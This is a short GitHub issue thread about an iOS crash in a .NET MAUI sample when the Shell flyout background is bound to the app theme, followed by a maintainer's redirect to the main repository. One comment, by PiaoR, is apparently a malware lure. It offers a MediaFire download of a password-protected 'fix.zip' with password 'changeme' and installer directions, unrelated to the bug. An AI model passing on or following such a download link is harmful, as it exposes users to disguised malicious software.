### ISSUE TITLE
Application Crashes when app goes in background

### ISSUE THREAD

**Issue by prasad210** [dotnet/maui-samples#506]
When we set the Flyout  background colour based on the theme it crashes on 
OS version: iosiPadOS 17.6.1
Model:iPad mini (6th generation)

    <Shell.FlyoutBackground>
        <x:AppThemeBinding Light="{StaticResource LightModeBackground}"
                           Dark="{StaticResource DarkModeBackground}"  />
    </Shell.FlyoutBackground>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jfversluis** [comment]
This seems more of a product issue that you might want to report to the .NET MAUI repo or see if something is already opened. When you do, please make sure to add a lot more details about the crash in order for it to be diagnosed properly.

Thanks!
